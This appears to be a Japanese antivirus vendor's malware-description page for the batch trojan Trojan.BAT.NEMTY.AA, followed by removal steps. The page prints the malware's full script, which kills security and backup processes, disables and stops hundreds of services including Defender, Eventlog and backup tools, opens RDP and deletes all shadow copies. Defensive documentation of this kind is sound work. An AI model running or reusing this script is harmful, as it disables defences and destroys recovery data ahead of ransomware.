taskkill /im cis.exe /f
taskkill /im vettray.exe /f
taskkill /im dolphincharge.e /f
taskkill /im ccapp.exe /f
taskkill /im swc_service.exe /f
taskkill /im cmdinstall.exe /f
taskkill /im caunst.exe /f
taskkill /im zlh.exe /f
taskkill /im ashwebsv.exe /f
taskkill /im crashrep.exe /f
taskkill /im dolphincharge.exe /f
taskkill /im casc.exe /f
taskkill /im usrprmpt.exe /f
taskkill /im navw32.exe /f
taskkill /im aswwebsv.exe /f
taskkill /im isafe.exe /f
taskkill /im fsorsp.exe /f
taskkill /im scanmailoutlook.exe /f
taskkill /im msseces.exe /f
taskkill /im pskmssvc.exe /f
taskkill /im bdmcon.exe /f
taskkill /im pep.exe /f
taskkill /im zavcore.exe /f
taskkill /im smex_systemwatc /f
taskkill /im patrolagent.exe /f
taskkill /im pmgreader.exe /f
taskkill /im mspub.exe /f
taskkill /im basfipm.exe /f
taskkill /im tfservice.exe /f
taskkill /im elogsvc.exe /f
taskkill /im smex_activeupda /f
taskkill /im v3svc.exe /f
taskkill /im tsmpnt.exe /f
taskkill /im vrvmail.exe /f
taskkill /im v3imscn.exe /f
taskkill /im ashskpcc.exe /f
taskkill /im cssauth.exe /f
taskkill /im tdimon.exe /f
taskkill /im mgavrtcl.exe /f
taskkill /im esmagent.exe /f
taskkill /im kvmonxp.kxp /f
taskkill /im zlclient.exe /f
taskkill /im pnmsrv.exe /f
taskkill /im ixavsvc.exe /f
taskkill /im pavjobs.exe /f
taskkill /im autoup.exe /f
taskkill /im msdtssrvr.exe /f
taskkill /im tclproc.exe /f
taskkill /im taskhostw.exe /f
taskkill /im nprotect.exe /f
taskkill /im drwebdc.exe /f
taskkill /im fsgk32.exe /f
taskkill /im wrspysetup.exe /f
taskkill /im nsmdtr.exe /f
taskkill /im firewallgui.exe /f
taskkill /im msksrvr.exe /f
taskkill /im sysoptenginesvc.exe /f
taskkill /im symproxysvc.exe /f
taskkill /im pagentwd.exe /f
taskkill /im nmain.exe /f
taskkill /im vprot.exe /f
taskkill /im dwwin.exe /f
taskkill /im clamscan.exe /f
taskkill /im ahnsd.exe /f
taskkill /im win32sysinfo.exe /f
taskkill /im spntsvc.exe /f
taskkill /im pop3trap.exe /f
taskkill /im prsummarymgr.exe /f
taskkill /im nscsrvce.exe /f
taskkill /im safeservice.exe /f
taskkill /im sms.exe /f
taskkill /im inort.exe /f
taskkill /im npfmsg2.exe /f
taskkill /im ixfwsvc.exe /f
taskkill /im v3exec.exe /f
taskkill /im cpd.exe /f
taskkill /im cstacacs.exe /f
taskkill /im ashserv.exe /f
taskkill /im klnagent.exe /f
taskkill /im ofcdog.exe /f
taskkill /im csinsm32.exe /f
taskkill /im fspex.exe /f
taskkill /im kvsrvxp_1.exe /f
taskkill /im mydesktopservice.exe /f
taskkill /im avserver.exe /f
taskkill /im aupdrun.exe /f
taskkill /im msaccess.exe /f
taskkill /im cylancesvc.exe /f
taskkill /im capfaem.exe /f
taskkill /im cpntsrv.exe /f
taskkill /im rnreport.exe /f
taskkill /im nortonsecurity.exe /f
taskkill /im savfmseui.exe /f
taskkill /im tmpfw.exe /f
taskkill /im svtray.exe /f
taskkill /im mfeann.exe /f
taskkill /im cfp.exe /f
taskkill /im ocomm.exe /f
taskkill /im cavtray.exe /f
taskkill /im savroam.exe /f
taskkill /im drweb386.exe /f
taskkill /im a2service.exe /f
taskkill /im iswmgr.exe /f
taskkill /im ravtask.exe /f
taskkill /im aawservice.exe /f
taskkill /im zanda.exe /f
taskkill /im retinaengine.exe /f
taskkill /im ngctw32.exe /f
taskkill /im savservice.exe /f
taskkill /im inonmsrv.exe /f
taskkill /im psuamain.exe /f
taskkill /im ashmaisv.exe /f
taskkill /im alunotify.exe /f
taskkill /im bdlite.exe /f
taskkill /im vrvnet.exe /f
taskkill /im smselog.exe /f
taskkill /im navwnt.exe /f
taskkill /im v3lite.exe /f
taskkill /im siteadv.exe /f
taskkill /im prproficymgr.exe /f
taskkill /im ccm messaging.exe /f
taskkill /im gfireporterservice.exe /f
taskkill /im paxton.net2.clientservice.exe /f
taskkill /im fsgk32st.exe /f
taskkill /im mcpromgr.exe /f
taskkill /im encsvc.exe /f
taskkill /im avconfig.exe /f
sc config EPSecurityService start= disable
sc config IMAP4Svc start= disabled
sc config EsgShKernel start= disabled
sc config BlueStripeCollector start= disabled
sc config VMware start= disabled
sc config EPUpdateServicestart= disabled
sc config ReportServer$SYSTEM_BGC start= disabled
sc config System start= disabled
sc config TSM start= disabled
sc config swi_service start= disabled
sc config TPVCGateway start= disabled
sc config Symantec start= disabled
sc config MSSQLFDLauncher$ITRIS start= disabled
sc config ntrtscan start= disabled
sc config DCAgent start= disabled
sc config Telemetryserver start= disabled
sc config "SQLsafe Backup Service" start= disabled
sc config UI0Detect start= disabled
sc config MSExchangeMTA start= disabled
sc config NetMsmqActivator start= disabled
sc config EPSecurityServicestart= disabled
sc config mfemms start= disabled
sc config SQLSERVERAGENT start= disabled
sc config MSSQLServerOLAPService start= disabled
sc config SentinelHelperService start= disabled
sc config HealthService start= disabled
sc config ImapiService start= disabled
sc config CSRadius start= disabled
sc config MSSQL$TPSAMA start= disabled
sc config ReportServer$TPS start= disabled
sc config SntpService start= disabled
sc config VeeamTransportSvc start= disabled
sc config SamSs start= disabled
sc config DB2 start= disabled
sc config ReportServer$TPSAMA start= disabled
sc config MSSQLFDLauncher$SHAREPOINT start= disabled
sc config MSSQL$PROFXENGAGEMENT start= disabled
sc config SQLAgent$PROFXENGAGEMENT start= disabled
sc config SepMasterServiceMig start= disabled
sc config SmcService start= disabled
sc config BackupExecRPCService start= disabled
sc config SQLAgent$PROD start= disabled
sc config MSExchangeMGMT start= disabled
sc config SQLAgent$TPSAMA start= disabled
sc config TmPfw start= disable
sc config MySQL57 start= disabled
sc config swi_update start= disabled
sc config "Symantec System Recovery" start= disabled
sc config VGAuthService start= disabled
sc config TlntSvr start= disabled
sc config MSSQL$SQLEXPRESS start= disabled
sc config VeeamMountSvc start= disabled
sc config SQLAgent$SQLEXPRESS start= disabled
sc config masvc start= disabled
sc config MMS start= disabled
sc config SQLAgent$SQL_2008 start= disabled
sc config VMwareCAFCommAmqpListener start= disabled
sc config SQLAgent$VEEAMSQL2012 start= disabled
sc config SnowInventoryClient start= disabled
sc config SNAC start= disabled
sc config tmlisten start= disabled
sc config SentinelStaticEngine start= disabled
sc config LogProcessorService start= disabled
sc config "Enterprise Client Service" start= disabled
sc config BrokerInfrastructurestart= disabled
sc config MSExchangeSRS start= disabled
sc config odserv start= disabled
sc config BackupExecAgentAccelerator start= disabled
sc config SQLBrowser start= disabled
sc config MSOLAP$SYSTEM_BGC start= disabled
sc config "Acronis VSS Provider" start= disabled
sc config CSAuth start= disabled
sc config VMTools start= disabled
sc config RSCDsvc start= disabled
sc config NtLmSsp start= disabled
sc config SQLSafeOLRService start= disabled
sc config MSExchangeSA start= disabled
sc config IDriverT start= disabled
sc config CSDbSync start= disabled
sc config CSMon start= disabled
sc config SQLAgent$CITRIX_METAFRAME start= disabled
sc config MSSQL$CITRIX_METAFRAME start= disabled
sc config MSSQLFDLauncher$SYSTEM_BGC start= disabled
sc config MSSQLSERVER start= disabled
sc config mozyprobackup start= disabled
sc config EPProtectedService start= disable
sc config sacsvr start= disabled
sc config MSOLAP$TPS start= disabled
sc config VeeamRESTSvc start= disabled
sc config epag start= disable
sc config TrueKey start= disabled
sc config BackupExecJobEngine start= disabled
sc config tpautoconnsvc start= disabled
sc config WinVNC4 start= disabled
sc config SQLAgent$SYSTEM_BGC start= disabled
sc config SQLAgent$TPS start= disabled
sc config AdobeARMservice start= disabled
sc config W3Svc start= disabled
sc config MSOLAP$TPSAMA start= disabled
sc config MsDtsServer100 start= disabled
sc config VMwareCAFManagementAgentHost start= disabled
sc config Net2ClientSvc start= disabled
sc config SQLAgent$SBSMONITORING start= disabled
sc config MSSQL$VEEAMSQL2012 start= disabled
sc config "SQLsafe Filter Service" start= disabled
sc config FA_Scheduler start= disabled
sc config "Zoolz 2 Service" start= disabled
sc config ccSetMgr start= disabled
sc config ReportServer start= disabled
sc config Smcinst start= disabled
sc config SQLAgent$VEEAMSQL2008R2 start= disabled
sc config GoogleChromeElevationService start= disabled
sc config aswBcc start= disabled
sc config EhttpSrv start= disabled
sc config vmware-converter-agent start= disabled
sc config SMTPSvc start= disabled
sc config PDVFSService start= disabled
sc config MSSQLFDLauncher$TPS start= disabled
sc config SQLAgent$BKUPEXEC start= disabled
sc config MSSQL$VEEAMSQL2008R2 start= disabled
sc config MBEndpointAgent start= disabled
sc config ose start= disabled
sc config ShMonitor start= disabled
sc config WRSVC start= disabled
sc config TrueKeyScheduler start= disabled
sc config DB2-0 start= disabled
sc config VeeamCloudSvc start= disabled
sc config EPUpdateService start= disable
sc config NtmsSvc start= disabled
sc config "Veeam Backup Catalog Data Service" start= disabled
sc config TrueKeyServiceHelper start= disabled
sc config SQLTELEMETRY$ECWDB2 start= disabled
sc config SQLAgent$ECWDB2 start= disabled
sc config SepMasterService start= disabled
sc config MSSQL$SYSTEM_BGC start= disabled
sc config CSAdmin start= disabled
sc config CpqRcmc3 start= disabled
sc config ProLiantMonitor start= disabled
sc config svcGenericHost start= disabled
sc config DB2LICD_DB2COPY1 start= disabled
sc config Alerter start= disabled
sc config MSSQL$SBSMONITORING start= disabled
sc config SQLWriter start= disabled
sc config RESvc start= disabled
sc config IBMDSServer41 start= disabled
sc config SQLAgent$NET2 start= disabled
sc config SQLAgent$EPOSERVER start= disabled
sc config Cissesrv start= disabled
sc config bcrservice start= disabled
sc config POP3Svc start= disabled
sc config MSSQL$EPOSERVER start= disabled
sc config MSOLAP$SQL_2008 start= disabled
sc config VeeamCatalogSvc start= disabled
sc config MSSQLFDLauncher$PROFXENGAGEMENT start= disabled
sc config BackupExecAgentBrowser start= disabled
sc config NetSvc start= disabled
sc config DB2INST2 start= disabled
sc config SDD_Service start= disabled
sc config SDRSVC start= disabled
sc config ReportServer$SQL_2008 start= disabled
sc config EPUpdateService start= disabled
sc config MSSQLServerADHelper100 start= disabled
sc config MSSQLFDLauncher start= disabled
sc config McShield start= disabled
sc config McTaskManager start= disabled
sc config ARSM start= disabled
sc config BackupExecDeviceMediaService start= disabled
sc config MSSQL$ITRIS start= disabled
sc config MSMQ start= disabled
sc config VeeamBrokerSvc start= disabled
sc config NetDDE start= disabled
sc config EPSecurityService start= disabled
sc config macmnsvc start= disabled
sc config SQLTELEMETRY$ITRIS start= disabled
sc config EPIntegrationService start= disable
sc config LRSDRVX start= disabled
sc config SQLAgent$ITRIS start= disabled
sc config MsDtsServer130 start= disabled
sc config VeeamNFSSvc start= disabled
sc config mfevtp start= disabled
sc config msftesql$PROD start= disabled
sc config MSSQL$PRACTTICEBGC start= disabled
sc config bedbg start= disabled
sc config MSExchangeES start= disabled
sc config BackupExecManagementService start= disabled
sc config VeeamDeploymentService start= disabled
sc config OracleClientCache80 start= disabled
sc config MSExchangeIS start= disabled
sc config BITSstart= disabled
sc config IBMDataServerMgr start= disabled
sc config avbackup start= disabled
sc config MsDtsServer110 start= disabled
sc config vmware-converter-worker start= disabled
sc config VeeamEnterpriseManagerSvc start= disabled
sc config BackupExecVSSProvider start= disabled
sc config TPAutoConnSvc start= disabled
sc config VeeamDeploySvc start= disabled
sc config MBAMService start= disabled
sc config VeeamHvIntegrationSvc start= disabled
sc config swi_filter start= disabled
sc config ERSvc start= disabled
sc config MsDtsServer start= disabled
sc config MSSQLFDLauncher$TPSAMA start= disabled
sc config gupdatem start= disabled
sc config SQLAgent$CXDB start= disabled
sc config msvsmon90 start= disabled
sc config mfewc start= disabled
sc config SSISTELEMETRY130 start= disabled
sc config MSSQL$PROD start= disabled
sc config CSLog start= disabled
sc config WebClient start= disabled
sc config EraserSvc11710 start= disabled
sc config epredline start= disable
sc config MSSQL$SQL_2008 start= disabled
sc config DB2GOVERNOR_DB2COPY1 start= disabled
sc config vmware-converter-server start= disabled
sc config CSTacacs start= disabled
sc config DB2MGMTSVC_DB2COPY1 start= disabled
sc config mfefire start= disabled
sc config swi_update_64 start= disabled
sc config MSSQLFDLauncher$SBSMONITORING start= disabled
sc config MSSQLFDLauncher$SQL_2008 start= disabled
sc config wbengine start= disabled
sc config SQLAgent$PRACTTICEMGT start= disabled
sc config WinDefend start= disabled
sc config DB2DAS00 start= disabled
sc config IISAdmin start= disabled
sc config VeeamBackupSvc start= disabled
sc config MSSQL$TPS start= disabled
sc config ESHASRV start= disabled
sc config SAVService start= disabled
sc config MSSQL$NET2 start= disabled
sc config MSSQLLaunchpad$ITRIS start= disabled
sc config DB2REMOTECMD_DB2COPY1 start= disabled
sc config "SQL Backups" start= disabled
sc config WdNisSvc start= disabled
sc config SQLAgent$SHAREPOINT start= disabled
sc config klnagent start= disabled
sc config MSSQL$PRACTICEMGT start= disabled
sc config MSSQL$BKUPEXEC start= disabled
sc config Eventlog start= disabled
sc config NimbusWatcherService start= disabled
sc config gupdate start= disabled
sc config ekrn start= disabled
sc config AcrSch2Svc start= disabled
sc config MSSQL$SHAREPOINT start= disabled
sc config SQLAgent$PRACTTICEBGC start= disabled
sc config SQLTELEMETRY start= disabled
sc config AcronisAgent start= disabled
sc config TmCCSF start= disabled
sc config MSSQL$ECWDB2 start= disabled
sc config MSSQLServerADHelper start= disabled
sc config SstpSvc start= disabled
sc config ccEvtMgr start= disabled
sc config SentinelAgent start= disabled
sc config sysdown start= disabled
net stop MSSQL$NET2 /y
net stop DB2-0 /y
net stop MSOLAP$TPS /y
net stop VMwareCAFCommAmqpListener /y
net stop BackupExecVSSProvider /y
net stop VMwareCAFManagementAgentHost /y
net stop VeeamBackupSvc /y
net stop BlueStripeCollector /y
net stop TrueKeyScheduler /y
net stop SQLSafeOLRService /y
net stop SQLWriter /y
net stop aswBcc /y
net stop TmCCSF /y
net stop DB2LICD_DB2COPY1 /y
net stop ReportServer$TPSAMA /y
net stop BackupExecAgentAccelerator /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop EPSecurityService /y
net stop AcrSch2Svc /y
net stop MSSQLFDLauncher$TPS /y
net stop McTaskManager /y
net stop POP3Svc /y
net stop MSSQL$ECWDB2 /y
net stop MSSQL$EPOSERVER /y
net stop "SQL Backups" /y
net stop VeeamTransportSvc /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop WdNisSvc /y
net stop VeeamNFSSvc /y
net stop MSSQL$CITRIX_METAFRAME /y
net stop SDRSVC /y
net stop myAgtSvc /y
net stop SMTPSvc /y
net stop masvc /y
net stop MMS /y
net stop MSSQLFDLauncher /y
net stop EPUpdateService /y
net stop EsgShKernel /y
net stop McShield /y
net stop ERSvc /y
net stop ose /y
net stop AcronisAgent /y
net stop CpqRcmc3 /y
net stop epag /y
net stop NtmsSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop DB2 /y
net stop MSSQL$VEEAMSQL2012 /y
net stop GoogleChromeElevationService /y
net stop VeeamRESTSvc /y
net stop avbackup /y
net stop VMTools /y
net stop MSSQL$SYSTEM_BGC /y
net stop ccSetMgr /y
net stop SepMasterService /y
net stop DB2GOVERNOR_DB2COPY1 /y
net stop wbengine /y
net stop SQLAgent$SBSMONITORING /y
net stop SentinelHelperService /y
net stop macmnsvc /y
net stop tmlisten /y
net stop ReportServer$SYSTEM_BGC /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop UI0Detect /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop Telemetryserver /y
net stop tpautoconnsvc /y
net stop MSSQL$BKUPEXEC /y
net stop ReportServer /y
net stop vmware-converter-server /y
net stop PDVFSService /y
net stop "Veeam Backup Catalog Data Service" /y
net stop SQLAgent$CXDB /y
net stop TPVCGateway /y
net stop VeeamBrokerSvc /y
net stop W3Svc /y
net stop SQLAgent$PROD /y
net stop SQLTELEMETRY$ITRIS /y
net stop DCAgent /y
net stop msvsmon90 /y
net stop ShMonitor /y
net stop BITS /y
net stop MSExchangeES /y
net stop SamSs /y
net stop RESvc /y
net stop BackupExecRPCService /y
net stop ekrn /y
net stop SmcService /y
net stop SntpService /y
net stop MsDtsServer /y
net stop VGAuthService /y
net stop SQLAgent$NET2 /y
net stop EhttpSrv /y
net stop IMAP4Svc /y
net stop SentinelStaticEngine /y
net stop OracleClientCache80 /y
net stop bcrservice /y
net stop MSOLAP$TPSAMA /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SQLAgent$SQLEXPRESS /y
net stop VeeamCatalogSvc /y
net stop NetDDE /y
net stop System /y
net stop SQLAgent$BKUPEXEC /y
net stop FA_Scheduler /y
net stop vmware-converter-worker /y
net stop SnowInventoryClient /y
net stop VeeamMountSvc /y
net stop SQLAgent$SQL_2008 /y
net stop SQLAgent$PRACTTICEBGC /y
net stop sacsvr /y
net stop swi_update /y
net stop MSExchangeSRS /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop IDriverT /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop "SQLsafe Backup Service" /y
net stop MSOLAP$SQL_2008 /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop AdobeARMservice /y
net stop MSSQL$PROD /y
net stop SQLAgent$PRACTTICEMGT /y
net stop ImapiService /y
net stop RSCDsvc /y
net stop MsDtsServer110 /y
net stop CSAuth /y
net stop MSSQLSERVER /y
net stop MSOLAP$SYSTEM_BGC /y
net stop TmPfw /y
net stop DB2DAS00 /y
net stop ESHASRV /y
net stop Symantec /y
net stop WRSVC /y
net stop MSSQLServerADHelper /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop BrokerInfrastructure /y
net stop MySQL57 /y
net stop mfevtp /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop MSSQLLaunchpad$ITRIS /y
net stop WinVNC4 /y
net stop MSSQL$TPSAMA /y
net stop MSExchangeMGMT /y
net stop BackupExecDeviceMediaService /y
net stop ntrtscan /y
net stop SstpSvc /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop mfemms /y
net stop SentinelAgent /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop VeeamCloudSvc /y
net stop VMware /y
net stop sysdown /y
net stop SAVService /y
net stop SQLAgent$TPSAMA /y
net stop vmware-converter-agent /y
net stop "SQLsafe Filter Service" /y
net stop MSSQL$ITRIS /y
net stop NetMsmqActivator /y
net stop IBMDSServer41 /y
net stop MSSQL$SHAREPOINT /y
net stop mozyprobackup /y
net stop CSMon /y
net stop SQLSERVERAGENT /y
net stop LogProcessorService /y
net stop RumorServer /y
net stop gupdatem /y
net stop ReportServer$SQL_2008 /y
net stop MSExchangeIS /y
net stop swi_filter /y
net stop SQLAgent$SYSTEM_BGC /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop CSDbSync /y
net stop WebClient /y
net stop VeeamDeploySvc /y
net stop "Symantec System Recovery" /y
net stop TPAutoConnSvc /y
net stop SQLAgent$ITRIS /y
net stop IBMDataServerMgr /y
net stop klnagent /y
net stop Smcinst /y
net stop SepMasterServiceMig /y
net stop MSSQLFDLauncher$ITRIS /y
net stop WinDefend /y
net stop "Zoolz 2 Service" /y
net stop MSExchangeSA /y
net stop MSSQL$SBSMONITORING /y
net stop MSSQL$PRACTICEMGT /y
net stop MSMQ /y
net stop ProLiantMonitor /y
net stop MsDtsServer130 /y
net stop Alerter /y
net stop SDD_Service /y
net stop CSAdmin /y
net stop EraserSvc11710 /y
net stop NimbusWatcherService /y
net stop MBEndpointAgent /y
net stop CSRadius /y
net stop BackupExecAgentBrowser /y
net stop SQLAgent$ECWDB2 /y
net stop HealthService /y
net stop odserv /y
net stop MSSQL$SQLEXPRESS /y
net stop IISAdmin /y
net stop VeeamHvIntegrationSvc /y
net stop VeeamEnterpriseManagerSvc /y
net stop swi_service /y
net stop DB2REMOTECMD_DB2COPY1 /y
net stop EPIntegrationService /y
net stop DB2INST2 /y
net stop NetSvc /y
net stop BackupExecJobEngine /y
net stop ccEvtMgr /y
net stop epredline /y
net stop Cissesrv /y
net stop EPProtectedService /y
net stop MSSQL$SQL_2008 /y
net stop SQLTELEMETRY /y
net stop MSSQLServerOLAPService /y
net stop MSExchangeMTA /y
net stop Eventlog /y
net stop CSTacacs /y
net stop Net2ClientSvc /y
net stop MSSQL$TPS /y
net stop MBAMService /y
net stop msftesql$PROD /y
net stop SQLAgent$TPS /y
net stop svcGenericHost /y
net stop TrueKey /y
net stop LRSDRVX /y
net stop gupdate /y
net stop SQLAgent$EPOSERVER /y
net stop "Enterprise Client Service" /y
net stop MSSQLServerADHelper100 /y
net stop ARSM /y
net stop SSISTELEMETRY130 /y
net stop swi_update_64 /y
net stop TSM /y
net stop VeeamDeploymentService /y
net stop CSLog /y
net stop SQLBrowser /y
net stop NtLmSsp /y
net stop MSSQL$PRACTTICEBGC /y
net stop BackupExecManagementService /y
net stop DB2MGMTSVC_DB2COPY1 /y
net stop bedbg /y
net stop mfefire /y
net stop ReportServer$TPS /y
net stop mfewc /y
net stop "Acronis VSS Provider" /y
net stop MsDtsServer100 /y
net stop TlntSvr /y
net stop SNAC /y
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
VSSADMIN delete shadows /all -quiets
c:\windows\temp\spt.exe

対応方法

対応検索エンジン: 9.850

初回 VSAPI パターンバージョン 15.940.05

初回 VSAPI パターンリリース日 2020年6月19日

VSAPI OPR パターンバージョン 15.941.00

VSAPI OPR パターンリリース日 2020年6月20日

手順 1

Windows 7、Windows 8、Windows 8.1、および Windows 10 のユーザは、コンピュータからマルウェアもしくはアドウェア等を完全に削除するために、ウイルス検索の実行前には必ず「システムの復元」を無効にしてください。

手順 2

このマルウェアもしくはアドウェア等の実行により、手順中に記載されたすべてのファイル、フォルダおよびレジストリキーや値がコンピュータにインストールされるとは限りません。インストールが不完全である場合の他、オペレーティングシステム（OS）の条件によりインストールがされない場合が考えられます。手順中に記載されたファイル／フォルダ／レジストリ情報が確認されない場合、該当の手順の操作は不要ですので、次の手順に進んでください。

手順 3

最新のバージョン（エンジン、パターンファイル）を導入したウイルス対策製品を用い、ウイルス検索を実行してください。「Trojan.BAT.NEMTY.AA」と検出したファイルはすべて削除してください。検出されたファイルが、弊社ウイルス対策製品により既に駆除、隔離またはファイル削除の処理が実行された場合、ウイルスの処理は完了しており、他の削除手順は特にありません。

ご利用はいかがでしたか？　アンケートにご協力ください